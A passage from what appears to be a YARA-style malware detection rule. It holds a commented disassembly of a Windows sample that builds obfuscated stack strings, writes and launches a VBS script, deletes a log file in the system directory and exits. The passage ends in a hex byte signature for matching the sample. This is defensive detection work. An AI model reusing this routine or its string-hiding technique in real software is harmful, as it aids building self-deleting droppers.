.text:0x00405de4 889c24f9000000 mov byte [esp + 249],bl + .text:0x00405deb c68424fa0000006f mov byte [esp + 250],111 + .text:0x00405df3 c68424fb00000062 mov byte [esp + 251],98 + .text:0x00405dfb c68424fc0000006a mov byte [esp + 252],106 + .text:0x00405e03 889c24fd000000 mov byte [esp + 253],bl + .text:0x00405e0a 888c24fe000000 mov byte [esp + 254],cl + .text:0x00405e11 888424ff000000 mov byte [esp + 255],al + .text:0x00405e18 c684240001000028 mov byte [esp + 256],40 + .text:0x00405e20 c684240101000022 mov byte [esp + 257],34 + .text:0x00405e28 c684240201000073 mov byte [esp + 258],115 + .text:0x00405e30 888c2403010000 mov byte [esp + 259],cl + .text:0x00405e37 88942404010000 mov byte [esp + 260],dl + .text:0x00405e3e c684240501000069 mov byte [esp + 261],105 + .text:0x00405e46 c684240601000070 mov byte [esp + 262],112 + .text:0x00405e4e 88842407010000 mov byte [esp + 263],al + .text:0x00405e55 c684240801000069 mov byte [esp + 264],105 + .text:0x00405e5d c68424090100006e mov byte [esp + 265],110 + .text:0x00405e65 c684240a01000067 mov byte [esp + 266],103 + .text:0x00405e6d c684240b0100002e mov byte [esp + 267],46 + .text:0x00405e75 c684240c01000066 mov byte [esp + 268],102 + .text:0x00405e7d c684240d01000069 mov byte [esp + 269],105 + .text:0x00405e85 c684240e0100006c mov byte [esp + 270],108 + .text:0x00405e8d 889c240f010000 mov byte [esp + 271],bl + .text:0x00405e94 c684241001000073 mov byte [esp + 272],115 + .text:0x00405e9c c684241101000079 mov byte [esp + 273],121 + .text:0x00405ea4 c684241201000073 mov byte [esp + 274],115 + .text:0x00405eac 88842413010000 mov byte [esp + 275],al + .text:0x00405eb3 889c2414010000 mov byte [esp + 276],bl + .text:0x00405eba c68424150100006d mov byte [esp + 277],109 + .text:0x00405ec2 c68424160100006f mov byte [esp + 278],111 + .text:0x00405eca c684241701000062 mov byte [esp + 279],98 + .text:0x00405ed2 c68424180100006a mov byte [esp + 280],106 + .text:0x00405eda 889c2419010000 mov byte [esp + 281],bl + .text:0x00405ee1 888c241a010000 mov byte [esp + 282],cl + .text:0x00405ee8 8884241b010000 mov byte [esp + 283],al + .text:0x00405eef c684241c01000022 mov byte [esp + 284],34 + .text:0x00405ef7 c684241d01000029 mov byte [esp + 285],41 + .text:0x00405eff c684241e0100002e mov byte [esp + 286],46 + .text:0x00405f07 c684241f01000064 mov byte [esp + 287],100 + .text:0x00405f0f 8b3578904000 mov esi,dword [0x00409078] + .text:0x00405f15 6a00 push 0 + .text:0x00405f17 889c2424010000 mov byte [esp + 292],bl + .text:0x00405f1e c68424250100006c mov byte [esp + 293],108 + .text:0x00405f26 889c2426010000 mov byte [esp + 294],bl + .text:0x00405f2d 88842427010000 mov byte [esp + 295],al + .text:0x00405f34 889c2428010000 mov byte [esp + 296],bl + .text:0x00405f3b c684242901000066 mov byte [esp + 297],102 + .text:0x00405f43 c684242a01000069 mov byte [esp + 298],105 + .text:0x00405f4b c684242b0100006c mov byte [esp + 299],108 + .text:0x00405f53 889c242c010000 mov byte [esp + 300],bl + .text:0x00405f5a c684242d01000020 mov byte [esp + 301],32 + .text:0x00405f62 c684242e01000077 mov byte [esp + 302],119 + .text:0x00405f6a c684242f01000073 mov byte [esp + 303],115 + .text:0x00405f72 888c2430010000 mov byte [esp + 304],cl + .text:0x00405f79 88942431010000 mov byte [esp + 305],dl + .text:0x00405f80 c684243201000069 mov byte [esp + 306],105 + .text:0x00405f88 c684243301000070 mov byte [esp + 307],112 + .text:0x00405f90 88842434010000 mov byte [esp + 308],al + .text:0x00405f97 c68424350100002e mov byte [esp + 309],46 + .text:0x00405f9f c684243601000073 mov byte [esp + 310],115 + .text:0x00405fa7 888c2437010000 mov byte [esp + 311],cl + .text:0x00405fae 88942438010000 mov byte [esp + 312],dl + .text:0x00405fb5 c684243901000069 mov byte [esp + 313],105 + .text:0x00405fbd c684243a01000070 mov byte [esp + 314],112 + .text:0x00405fc5 8884243b010000 mov byte [esp + 315],al + .text:0x00405fcc c684243c01000066 mov byte [esp + 316],102 + .text:0x00405fd4 c684243d01000075 mov byte [esp + 317],117 + .text:0x00405fdc c684243e0100006c mov byte [esp + 318],108 + .text:0x00405fe4 c684243f0100006c mov byte [esp + 319],108 + .text:0x00405fec c68424400100006e mov byte [esp + 320],110 + .text:0x00405ff4 c684244101000061 mov byte [esp + 321],97 + .text:0x00405ffc c68424420100006d mov byte [esp + 322],109 + .text:0x00406004 889c2443010000 mov byte [esp + 323],bl + .text:0x0040600b c684244401000000 mov byte [esp + 324],0 + .text:0x00406013 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406015 6a00 push 0 + .text:0x00406017 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406019 8d8424ac010000 lea eax,dword [esp + 428] + .text:0x00406020 6804010000 push 260 + .text:0x00406025 50 push eax + .text:0x00406026 6a00 push 0 + .text:0x00406028 ff1538914000 call dword [0x00409138] ;kernel32.GetModuleFileNameA(0,local756,260) + .text:0x0040602e b10a mov cl,10 + .text:0x00406030 b00d mov al,13 + .text:0x00406032 6a00 push 0 + .text:0x00406034 c644247825 mov byte [esp + 120],37 + .text:0x00406039 c644247973 mov byte [esp + 121],115 + .text:0x0040603e 884c247a mov byte [esp + 122],cl + .text:0x00406042 8844247b mov byte [esp + 123],al + .text:0x00406046 c644247c25 mov byte [esp + 124],37 + .text:0x0040604b c644247d73 mov byte [esp + 125],115 + .text:0x00406050 884c247e mov byte [esp + 126],cl + .text:0x00406054 8844247f mov byte [esp + 127],al + .text:0x00406058 c684248000000025 mov byte [esp + 128],37 + .text:0x00406060 c684248100000073 mov byte [esp + 129],115 + .text:0x00406068 888c2482000000 mov byte [esp + 130],cl + .text:0x0040606f 88842483000000 mov byte [esp + 131],al + .text:0x00406076 c684248400000025 mov byte [esp + 132],37 + .text:0x0040607e c684248500000073 mov byte [esp + 133],115 + .text:0x00406086 888c2486000000 mov byte [esp + 134],cl + .text:0x0040608d 88842487000000 mov byte [esp + 135],al + .text:0x00406094 c684248800000025 mov byte [esp + 136],37 + .text:0x0040609c c684248900000073 mov byte [esp + 137],115 + .text:0x004060a4 888c248a000000 mov byte [esp + 138],cl + .text:0x004060ab 8884248b000000 mov byte [esp + 139],al + .text:0x004060b2 c684248c00000025 mov byte [esp + 140],37 + .text:0x004060ba c684248d00000073 mov byte [esp + 141],115 + .text:0x004060c2 c684248e00000025 mov byte [esp + 142],37 + .text:0x004060ca c684248f00000073 mov byte [esp + 143],115 + .text:0x004060d2 c684249000000025 mov byte [esp + 144],37 + .text:0x004060da c684249100000073 mov byte [esp + 145],115 + .text:0x004060e2 888c2492000000 mov byte [esp + 146],cl + .text:0x004060e9 88842493000000 mov byte [esp + 147],al + .text:0x004060f0 c684249400000025 mov byte [esp + 148],37 + .text:0x004060f8 c684249500000073 mov byte [esp + 149],115 + .text:0x00406100 c684249600000000 mov byte [esp + 150],0 + .text:0x00406108 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040610a 8d8c24f4000000 lea ecx,dword [esp + 244] + .text:0x00406111 8d54241c lea edx,dword [esp + 28] + .text:0x00406115 51 push ecx + .text:0x00406116 8d8424b0010000 lea eax,dword [esp + 432] + .text:0x0040611d 52 push edx + .text:0x0040611e 8d4c2450 lea ecx,dword [esp + 80] + .text:0x00406122 50 push eax + .text:0x00406123 8d542440 lea edx,dword [esp + 64] + .text:0x00406127 51 push ecx + .text:0x00406128 8d8424cc000000 lea eax,dword [esp + 204] + .text:0x0040612f 52 push edx + .text:0x00406130 8d8c24a8000000 lea ecx,dword [esp + 168] + .text:0x00406137 50 push eax + .text:0x00406138 8d542474 lea edx,dword [esp + 116] + .text:0x0040613c 51 push ecx + .text:0x0040613d 8d442430 lea eax,dword [esp + 48] + .text:0x00406141 52 push edx + .text:0x00406142 8d8c2494000000 lea ecx,dword [esp + 148] + .text:0x00406149 50 push eax + .text:0x0040614a 8d9424d0020000 lea edx,dword [esp + 720] + .text:0x00406151 51 push ecx + .text:0x00406152 52 push edx + .text:0x00406153 e8681d0000 call 0x00407ec0 ;msvcrt.sprintf(local500,local1068) + .text:0x00406158 83c42c add esp,44 + .text:0x0040615b 6a00 push 0 + .text:0x0040615d ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040615f 6810270000 push 0x00002710 + .text:0x00406164 e8b70b0000 call 0x00406d20 ;sub_00406d20(0x00002710) + .text:0x00406169 83c404 add esp,4 + .text:0x0040616c 8bf8 mov edi,eax + .text:0x0040616e c68424af01000000 mov byte [esp + 431],0 + .text:0x00406176 c644242825 mov byte [esp + 40],37 + .text:0x0040617b 6a00 push 0 + .text:0x0040617d c644242d73 mov byte [esp + 45],115 + .text:0x00406182 c644242e25 mov byte [esp + 46],37 + .text:0x00406187 c644242f64 mov byte [esp + 47],100 + .text:0x0040618c c64424302e mov byte [esp + 48],46 + .text:0x00406191 c644243176 mov byte [esp + 49],118 + .text:0x00406196 c644243262 mov byte [esp + 50],98 + .text:0x0040619b c644243373 mov byte [esp + 51],115 + .text:0x004061a0 c644243400 mov byte [esp + 52],0 + .text:0x004061a5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004061a7 8d8424ac010000 lea eax,dword [esp + 428] + .text:0x004061ae 57 push edi + .text:0x004061af 8d4c242c lea ecx,dword [esp + 44] + .text:0x004061b3 50 push eax + .text:0x004061b4 8d942450010000 lea edx,dword [esp + 336] + .text:0x004061bb 51 push ecx + .text:0x004061bc 52 push edx + .text:0x004061bd e8fe1c0000 call 0x00407ec0 ;msvcrt.sprintf(local856,local1144) + .text:0x004061c2 83c410 add esp,16 + .text:0x004061c5 6a00 push 0 + .text:0x004061c7 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004061c9 6a00 push 0 + .text:0x004061cb 6a00 push 0 + .text:0x004061cd 6a02 push 2 + .text:0x004061cf 6a00 push 0 + .text:0x004061d1 6a00 push 0 + .text:0x004061d3 8d84245c010000 lea eax,dword [esp + 348] + .text:0x004061da 6800000040 push 0x40000000 + .text:0x004061df 50 push eax + .text:0x004061e0 ff15ac904000 call dword [0x004090ac] ;kernel32.CreateFileA(local856,0x40000000,0,0,2,0,0) + .text:0x004061e6 6a00 push 0 + .text:0x004061e8 8bf8 mov edi,eax + .text:0x004061ea ffd6 call esi ;kernel32.Sleep(0) + .text:0x004061ec 8d8c2444010000 lea ecx,dword [esp + 324] + .text:0x004061f3 6a00 push 0 + .text:0x004061f5 51 push ecx + .text:0x004061f6 8d9424b4020000 lea edx,dword [esp + 692] + .text:0x004061fd 68f4010000 push 500 + .text:0x00406202 52 push edx + .text:0x00406203 57 push edi + .text:0x00406204 ff15a4904000 call dword [0x004090a4] ;kernel32.WriteFile(kernel32.CreateFileA(local856,0x40000000,0,0,2,0,0),local500,500,local860,0) + .text:0x0040620a 6a00 push 0 + .text:0x0040620c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040620e 57 push edi + .text:0x0040620f ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x004061e0>) + .text:0x00406215 6a00 push 0 + .text:0x00406217 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406219 6a00 push 0 + .text:0x0040621b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040621d c644240c6f mov byte [esp + 12],111 + .text:0x00406222 c644240d70 mov byte [esp + 13],112 + .text:0x00406227 885c240e mov byte [esp + 14],bl + .text:0x0040622b 6a00 push 0 + .text:0x0040622d c64424136e mov byte [esp + 19],110 + .text:0x00406232 c644241400 mov byte [esp + 20],0 + .text:0x00406237 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406239 6a00 push 0 + .text:0x0040623b 6a00 push 0 + .text:0x0040623d 8d842450010000 lea eax,dword [esp + 336] + .text:0x00406244 6a00 push 0 + .text:0x00406246 8d4c2418 lea ecx,dword [esp + 24] + .text:0x0040624a 50 push eax + .text:0x0040624b 51 push ecx + .text:0x0040624c 6a00 push 0 + .text:0x0040624e ff15ac914000 call dword [0x004091ac] ;shell32.ShellExecuteA(0,local1172,local856,0,0,0) + .text:0x00406254 6a00 push 0 + .text:0x00406256 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406258 6a00 push 0 + .text:0x0040625a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040625c 6a00 push 0 + .text:0x0040625e ff1510914000 call dword [0x00409110] ;kernel32.ExitProcess(0) + .text:0x00406264 5f pop edi + .text:0x00406265 5e pop esi + .text:0x00406266 5b pop ebx + .text:0x00406267 90 nop + .text:0x00406268 90 nop + .text:0x00406269 90 nop + .text:0x0040626a 90 nop + .text:0x0040626b 90 nop + .text:0x0040626c 90 nop + .text:0x0040626d 90 nop + .text:0x0040626e 90 nop + .text:0x0040626f 90 nop + .text:0x00406270 + .text:0x00406270 FUNC: int cdecl sub_00406270( ) [2 XREFS] + .text:0x00406270 + .text:0x00406270 Stack Variables: (offset from initial top of stack) + .text:0x00406270 -260: int local260 + .text:0x00406270 -261: int local261 + .text:0x00406270 -262: int local262 + .text:0x00406270 -263: int local263 + .text:0x00406270 -264: int local264 + .text:0x00406270 -265: int local265 + .text:0x00406270 -266: int local266 + .text:0x00406270 -267: int local267 + .text:0x00406270 -268: int local268 + .text:0x00406270 -269: int local269 + .text:0x00406270 -270: int local270 + .text:0x00406270 -271: int local271 + .text:0x00406270 -272: int local272 + .text:0x00406270 -273: int local273 + .text:0x00406270 -274: int local274 + .text:0x00406270 -275: int local275 + .text:0x00406270 -276: int local276 + .text:0x00406270 -277: int local277 + .text:0x00406270 -278: int local278 + .text:0x00406270 -279: int local279 + .text:0x00406270 -280: int local280 + .text:0x00406270 -284: int local284 + .text:0x00406270 -285: int local285 + .text:0x00406270 -286: int local286 + .text:0x00406270 -287: int local287 + .text:0x00406270 -288: int local288 + .text:0x00406270 -289: int local289 + .text:0x00406270 -290: int local290 + .text:0x00406270 -291: int local291 + .text:0x00406270 -292: int local292 + .text:0x00406270 -293: int local293 + .text:0x00406270 -294: int local294 + .text:0x00406270 -295: int local295 + .text:0x00406270 -296: int local296 + .text:0x00406270 -297: int local297 + .text:0x00406270 -298: int local298 + .text:0x00406270 -299: int local299 + .text:0x00406270 -300: int local300 + .text:0x00406270 -301: int local301 + .text:0x00406270 -302: int local302 + .text:0x00406270 -303: int local303 + .text:0x00406270 -304: int local304 + .text:0x00406270 -305: int local305 + .text:0x00406270 -306: int local306 + .text:0x00406270 -307: int local307 + .text:0x00406270 -308: int local308 + .text:0x00406270 + .text:0x00406270 81ec34010000 sub esp,308 + .text:0x00406276 b045 mov al,69 + .text:0x00406278 53 push ebx + .text:0x00406279 56 push esi + .text:0x0040627a 8b3578904000 mov esi,dword [0x00409078] + .text:0x00406280 88442415 mov byte [esp + 21],al + .text:0x00406284 88442418 mov byte [esp + 24],al + .text:0x00406288 57 push edi + .text:0x00406289 b065 mov al,101 + .text:0x0040628b b374 mov bl,116 + .text:0x0040628d b179 mov cl,121 + .text:0x0040628f 6a00 push 0 + .text:0x00406291 c644241c4b mov byte [esp + 28],75 + .text:0x00406296 c644241e52 mov byte [esp + 30],82 + .text:0x0040629b c644241f4e mov byte [esp + 31],78 + .text:0x004062a0 c64424214c mov byte [esp + 33],76 + .text:0x004062a5 c644242233 mov byte [esp + 34],51 + .text:0x004062aa c644242332 mov byte [esp + 35],50 + .text:0x004062af c64424242e mov byte [esp + 36],46 + .text:0x004062b4 c644242564 mov byte [esp + 37],100 + .text:0x004062b9 c64424266c mov byte [esp + 38],108 + .text:0x004062be c64424276c mov byte [esp + 39],108 + .text:0x004062c3 c644242800 mov byte [esp + 40],0 + .text:0x004062c8 c644242c47 mov byte [esp + 44],71 + .text:0x004062cd 8844242d mov byte [esp + 45],al + .text:0x004062d1 885c242e mov byte [esp + 46],bl + .text:0x004062d5 c644242f53 mov byte [esp + 47],83 + .text:0x004062da 884c2430 mov byte [esp + 48],cl + .text:0x004062de c644243173 mov byte [esp + 49],115 + .text:0x004062e3 885c2432 mov byte [esp + 50],bl + .text:0x004062e7 88442433 mov byte [esp + 51],al + .text:0x004062eb c64424346d mov byte [esp + 52],109 + .text:0x004062f0 c644243544 mov byte [esp + 53],68 + .text:0x004062f5 c644243669 mov byte [esp + 54],105 + .text:0x004062fa c644243772 mov byte [esp + 55],114 + .text:0x004062ff 88442438 mov byte [esp + 56],al + .text:0x00406303 c644243963 mov byte [esp + 57],99 + .text:0x00406308 885c243a mov byte [esp + 58],bl + .text:0x0040630c c644243b6f mov byte [esp + 59],111 + .text:0x00406311 c644243c72 mov byte [esp + 60],114 + .text:0x00406316 884c243d mov byte [esp + 61],cl + .text:0x0040631a c644243e41 mov byte [esp + 62],65 + .text:0x0040631f c644243f00 mov byte [esp + 63],0 + .text:0x00406324 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406326 8d442428 lea eax,dword [esp + 40] + .text:0x0040632a 8d4c2418 lea ecx,dword [esp + 24] + .text:0x0040632e 50 push eax + .text:0x0040632f 51 push ecx + .text:0x00406330 ff15ec904000 call dword [0x004090ec] ;kernel32.LoadLibraryA(local1472) + .text:0x00406336 50 push eax + .text:0x00406337 ff15e8904000 call dword [0x004090e8] ;kernel32.GetProcAddress(kernel32,local1456) + .text:0x0040633d 6a00 push 0 + .text:0x0040633f 8bf8 mov edi,eax + .text:0x00406341 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406343 8d54243c lea edx,dword [esp + 60] + .text:0x00406347 6804010000 push 260 + .text:0x0040634c 52 push edx + .text:0x0040634d ffd7 call edi ;kernel32.GetSystemDirectoryA(local1436,260) + .text:0x0040634f 6a00 push 0 + .text:0x00406351 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406353 6a00 push 0 + .text:0x00406355 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406357 6a00 push 0 + .text:0x00406359 c64424105c mov byte [esp + 16],92 + .text:0x0040635e c64424116f mov byte [esp + 17],111 + .text:0x00406363 c644241275 mov byte [esp + 18],117 + .text:0x00406368 c644241372 mov byte [esp + 19],114 + .text:0x0040636d c64424146c mov byte [esp + 20],108 + .text:0x00406372 c64424156f mov byte [esp + 21],111 + .text:0x00406377 c644241667 mov byte [esp + 22],103 + .text:0x0040637c c64424172e mov byte [esp + 23],46 + .text:0x00406381 c644241864 mov byte [esp + 24],100 + .text:0x00406386 c644241961 mov byte [esp + 25],97 + .text:0x0040638b 885c241a mov byte [esp + 26],bl + .text:0x0040638f c644241b00 mov byte [esp + 27],0 + .text:0x00406394 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406396 8d44240c lea eax,dword [esp + 12] + .text:0x0040639a 8d4c243c lea ecx,dword [esp + 60] + .text:0x0040639e 50 push eax + .text:0x0040639f 51 push ecx + .text:0x004063a0 ff15cc904000 call dword [0x004090cc] ;kernel32.lstrcatA(local1436,local1484) + .text:0x004063a6 6a00 push 0 + .text:0x004063a8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063aa 6a00 push 0 + .text:0x004063ac ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063ae 8d54243c lea edx,dword [esp + 60] + .text:0x004063b2 52 push edx + .text:0x004063b3 ff1518914000 call dword [0x00409118] ;kernel32.DeleteFileA(local1436) + .text:0x004063b9 6a00 push 0 + .text:0x004063bb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004063bd e85ef5ffff call 0x00405920 ;sub_00405920() + .text:0x004063c2 5f pop edi + .text:0x004063c3 5e pop esi + .text:0x004063c4 5b pop ebx + .text:0x004063c5 81c434010000 add esp,308 + .text:0x004063cb c3 ret + */ + $c6 = { 81 EC 94 04 00 00 53 56 57 B9 18 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 00 C6 84 24 ?? ?? ?? ?? 00 F3 AB 66 AB AA B9 7C 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 00 F3 AB 66 AB AA B9 3F 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? B2 72 F3 AB 66 AB AA B3 65 B0 74 B1 63 C6 44 24 ?? 64 C6 44 24 ?? 69 C6 44 24 ?? 6D C6 44 24 ?? 20 C6 44 24 ?? 77 C6 44 24 ?? 73 C6 44 24 ?? 68 C6 44 24 ?? 00 C6 44 24 ?? 4F C6 44 24 ?? 6E C6 44 24 ?? 20 C6 44 24 ?? 45 88 54 24 ?? 88 54 24 ?? C6 44 24 ?? 6F 88 54 24 ?? C6 44 24 ?? 20 C6 44 24 ?? 52 88 5C 24 ?? C6 44 24 ?? 73 C6 44 24 ?? 75 C6 44 24 ?? 6D 88 5C 24 ?? C6 44 24 ?? 20 C6 44 24 ?? 4E 88 5C 24 ?? C6 44 24 ?? 78 88 44 24 ?? C6 44 24 ?? 00 C6 84 24 ?? ?? ?? ?? 73 88 9C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 20 C6 84 24 ?? ?? ?? ?? 77 C6 84 24 ?? ?? ?? ?? 73 C6 84 24 ?? ?? ?? ?? 68 C6 84 24 ?? ?? ?? ?? 3D 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 61 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 4F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A 88 9C 24 ?? ?? ?? ?? 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 28 C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 57 C6 84 24 ?? ?? ?? ?? 53 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 70 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 2E C6 84 24 ?? ?? ?? ?? 53 C6 84 24 ?? ?? ?? ?? 68 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 6C C6 84 24 ?? ?? ?? ?? 6C C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 29 C6 84 24 ?? ?? ?? ?? 00 C6 84 24 ?? ?? ?? ?? 53 88 9C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 20 C6 84 24 ?? ?? ?? ?? 6F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A C6 84 24 ?? ?? ?? ?? 46 C6 84 24 ?? ?? ?? ?? 53 C6 84 24 ?? ?? ?? ?? 4F C6 84 24 ?? ?? ?? ?? 20 C6 84 24 ?? ?? ?? ?? 3D C6 84 24 ?? ?? ?? ?? 20 C6 84 24 ?? ?? ?? ?? 43 88 94 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 61 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 4F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A 88 9C 24 ?? ?? ?? ?? 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 28 C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 53 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 70 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 6E C6 84 24 ?? ?? ?? ?? 67 C6 84 24 ?? ?? ?? ?? 2E C6 84 24 ?? ?? ?? ?? 46 C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 6C 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 53 C6 84 24 ?? ?? ?? ?? 79 C6 84 24 ?? ?? ?? ?? 73 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 6D C6 84 24 ?? ?? ?? ?? 4F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A 88 9C 24 ?? ?? ?? ?? 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 29 C6 84 24 ?? ?? ?? ?? 00 C6 44 24 ?? 77 C6 44 24 ?? 73 88 4C 24 ?? 88 54 24 ?? C6 44 24 ?? 69 C6 44 24 ?? 70 88 44 24 ?? C6 44 24 ?? 2E C6 44 24 ?? 73 C6 44 24 ?? 6C 88 5C 24 ?? 88 5C 24 ?? C6 44 24 ?? 70 C6 44 24 ?? 20 C6 44 24 ?? 31 C6 44 24 ?? 30 C6 44 24 ?? 30 C6 44 24 ?? 30 C6 44 24 ?? 00 C6 44 24 ?? 6F C6 44 24 ?? 62 C6 44 24 ?? 6A C6 44 24 ?? 46 C6 44 24 ?? 53 C6 44 24 ?? 4F C6 44 24 ?? 2E C6 44 24 ?? 44 88 5C 24 ?? C6 44 24 ?? 6C 88 5C 24 ?? 88 44 24 ?? 88 5C 24 ?? C6 44 24 ?? 46 C6 44 24 ?? 69 C6 44 24 ?? 6C 88 5C 24 ?? C6 44 24 ?? 28 C6 44 24 ?? 22 C6 44 24 ?? 00 C6 44 24 ?? 22 C6 44 24 ?? 29 C6 44 24 ?? 2C C6 44 24 ?? 20 C6 44 24 ?? 54 88 54 24 ?? C6 44 24 ?? 75 88 5C 24 ?? C6 44 24 ?? 00 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 61 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 6F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A 88 9C 24 ?? ?? ?? ?? 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 28 C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 70 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 6E C6 84 24 ?? ?? ?? ?? 67 C6 84 24 ?? ?? ?? ?? 2E C6 84 24 ?? ?? ?? ?? 66 C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 6C 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 73 C6 84 24 ?? ?? ?? ?? 79 C6 84 24 ?? ?? ?? ?? 73 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 6D C6 84 24 ?? ?? ?? ?? 6F C6 84 24 ?? ?? ?? ?? 62 C6 84 24 ?? ?? ?? ?? 6A 88 9C 24 ?? ?? ?? ?? 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 22 C6 84 24 ?? ?? ?? ?? 29 C6 84 24 ?? ?? ?? ?? 2E C6 84 24 ?? ?? ?? ?? 64 8B 35 ?? ?? ?? ?? 6A 00 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 6C 88 9C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 66 C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 6C 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 20 C6 84 24 ?? ?? ?? ?? 77 C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 70 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 2E C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 94 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 69 C6 84 24 ?? ?? ?? ?? 70 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 66 C6 84 24 ?? ?? ?? ?? 75 C6 84 24 ?? ?? ?? ?? 6C C6 84 24 ?? ?? ?? ?? 6C C6 84 24 ?? ?? ?? ?? 6E C6 84 24 ?? ?? ?? ?? 61 C6 84 24 ?? ?? ?? ?? 6D 88 9C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 00 FF D6 6A 00 FF D6 8D 84 24 ?? ?? ?? ?? 68 04 01 00 00 50 6A 00 FF 15 ?? ?? ?? ?? B1 0A B0 0D 6A 00 C6 44 24 ?? 25 C6 44 24 ?? 73 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 25 C6 44 24 ?? 73 88 4C 24 ?? 88 44 24 ?? C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 88 8C 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? 25 C6 84 24 ?? ?? ?? ?? 73 88 